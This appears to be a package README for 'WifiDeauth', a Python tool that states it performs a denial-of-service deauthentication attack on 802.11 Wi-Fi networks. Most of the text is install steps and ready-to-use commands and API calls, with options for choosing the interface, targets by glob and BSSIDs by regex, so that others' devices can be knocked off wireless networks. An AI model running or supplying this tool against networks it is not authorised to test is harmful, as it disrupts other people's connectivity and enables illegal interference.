WifiDeauth
1.0.0
This package implement a Dos attack on Wifi (protocol: 802.11) named Deauth.
This package require :
pip install WifiDeauthWifiDeauth -h
WifiDeauth --help
WifiDeauth -vvvvv # max verbose level
WifiDeauth -i "wlan0" # use specific interface
WifiDeauth -t "0A*" # using glob syntax to define targets
WifiDeauth -b "^([a-fA-F0-9]{2}:?){6}$" # using regex syntax to define BSSIDfrom WifiDeauth import WifiDeauth
deauth = WifiDeauth(targets="0A*", bssid="^([a-fA-F0-9]{2}:?){6}$", interface="wlan0", debug=5)
deauth.sniff()python3 -m pip install scapy # install requirements
python3 WifiDeauth.pyz -vvvvv
# OR
python3 -m pip install scapy # install requirements
chmod u+x WifiDeauth.pyz # add execute rights
./WifiDeauth.pyz -b "*" # execute filepython3 -m WifiDeauth
python3 -m WifiDeauth.WifiDeauth -i "wlan0"Licensed under the GPL, version 3.